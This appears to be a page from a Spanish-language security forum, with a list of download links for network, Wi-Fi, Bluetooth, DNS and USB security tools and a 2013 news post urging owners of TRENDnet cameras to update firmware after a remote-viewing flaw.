- D.Directa (x64): https://www.nirsoft.net/utils/cports-x64.zip

Tráfico de red: Para capturar el tráfico de red es necesario instalar *Winpcap.
La mayoría de instaladores nos darán la opción de instalarlo durante la ejecución.

Wireshark:
- Web: https://www.wireshark.org/
- D.Directa: https://www.wireshark.org/#download

SmartSniff:
- Web: https://www.nirsoft.net/utils/smsniff.html
- D.Directa (x32): https://www.nirsoft.net/utils/smsniff.zip
- D.Directa (x64): https://www.nirsoft.net/utils/smsniff-x64.zip

HTTPNetworkSniffer:
- Web: https://www.nirsoft.net/utils/http_network_sniffer.html
- D.Directa (x32): https://www.nirsoft.net/utils/httpnetworksniffer.zip
- D.Directa (x64): https://www.nirsoft.net/utils/httpnetworksniffer-x64.zip

*Winpcap:
- Web: https://www.winpcap.org/
- D.Directa: https://www.winpcap.org/install/bin/WinPcap_4_1_3.exe
- Guía: https://www.winpcap.org/docs/default.htm

WiFi:

Wireless Network Watcher:
- Web: https://www.nirsoft.net/utils/wireless_network_watcher.html
- D.Directa: https://www.nirsoft.net/utils/wnetwatcher.zip

WirelessNetView:
- Web: https://www.nirsoft.net/utils/wireless_network_view.html
- D.Directa: https://www.nirsoft.net/utils/wirelessnetview.zip

Wireless Intrusion Detection Testing Tool (necesario Python):
- Web: https://code.google.com/p/wireless-intrusion-detection-system-testing-tool/downloads/detail?name=WIDSTT.py&can=2&q=
- D.Directa: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/wireless-intrusion-detection-system-testing-tool/WIDSTT.py

Bluetooth:

BluetoothView:
- Web: https://www.nirsoft.net/utils/bluetooth_viewer.html
- D.Directa: https://www.nirsoft.net/utils/bluetoothview.zip

DNS:

DNSQuerySniffer:
- Web: https://www.nirsoft.net/utils/dns_query_sniffer.html
- D.Directa (x32): https://www.nirsoft.net/utils/dnsquerysniffer.zip
- D.Directa (x64): https://www.nirsoft.net/utils/dnsquerysniffer-x64.zip

USB:

Bitdefender USB Immunizer:
Web: https://labs.bitdefender.com/2011/03/bitdefender-usb-immunizer/
D.Directa: http://labs.bitdefender.com/wp-content/uploads/downloads/bitdefender-usb-immunizer-2/

Panda USB Vaccine:
Web: https://www.pandasecurity.com/en/mediacenter/products/panda-usb-vaccine-version-1-0-1-4/
D.Directa: https://download.cnet.com/Panda-USB-Vaccine/3000-2239_4-10909938.html?part=dl-55967&subj=dl&tag=button

Panda Cloud Cleaner - USB de análisis:
- D.Directa: http://acs.pandasoftware.com/pandacloudcleaner/rescuedisk/PandaCloudCleanerUSB.exe

En este tema podréis encontrar plugins para todos los navegadores relacionados con la seguridad y privacidad:

https://foro.elhacker.net/seguridad/plugins_para_los_navegadores_ff_ie_o_m_cd_s-t383613.0.html

Aquí puedes encontrar servicios online para analizar archivos, páginas web, js, flash, apk:

https://foro.elhacker.net/seguridad/servicios_online_para_analizar_el_pc_paginas_web_y_archivos-t423861.0.html

Actualizado: 21.12.2020

Saludos.
370  Foros Generales / Noticias / Vulnerabilidad en cámaras TRENDnet todavía afecta a miles de usuarios en: 28 Enero 2013, 04:49 am
Un año después de que se publicaran fallas en las cámaras de seguridad TRENDnet en el sitio de la BBC, todavía siguen apareciendo miles de usuarios afectados debido a la falta de concientización de los usuarios.

Estas cámaras de seguridad permiten hoy en día ser accedidas en forma remota desde prácticamente cualquier dispositivo con acceso a Internet. Una falla de seguridad descubierta por el creador del blog Console Cowboys 1 año atrás permitía poder visualizar de forma remota lo que capturaban las cámaras de dicha marca más allá que estuvieran protegidas con contraseña. De esta forma, y mediante búsquedas específicas, el dueño del blog pudo listar miles de equipos vulnerables a esta importante falla. A continuación se observa un ejemplo de una de las cámaras:



Aquí otro ejemplo, en este caso lo que parece ser una ventanilla de un banco:



Debido a la gran cantidad de cámaras encontradas y buscando la generación de conciencia el descubridor de la falla vinculó la información obtenida con la geolocalización de Google Maps para mostrar el verdadero impacto de su descubrimiento. A continuación se observan los resultados obtenidos:



La empresa TRENDnet, al enterarse de la falla, publicó una actualización del firmware para sus dispositivos afectados la cual recomendamos descarguen todos aquellos que posean un producto de esta marca. A su vez intentó contactar a sus clientes afectados, pero solo pudo dar aviso a aquellos que registraron sus cámaras dentro del sitio web de la empresa, los cuales solo representaban al 5% de los afectados.

Es por esto que a la fecha se siguen encontrando miles de equipos vulnerables a esta falla. A modo de recomendación, a todos aquellos que posean una de estas cámaras es de gran importancia que actualicen lo antes posibles el firmware de la misma y que también registren el producto dentro del sitio web del fabricante para poder estar al tanto de estos sucesos. Hasta entonces, lo que supuestamente se adquirió con el objetivo de tener más seguridad puede estar generando completamente lo opuesto.

Actualizar el firmware: http://www.trendnet.com/downloads/

Fuente: http://blogs.eset-la.com
Páginas: 1 ... 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 [37] 38 39
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines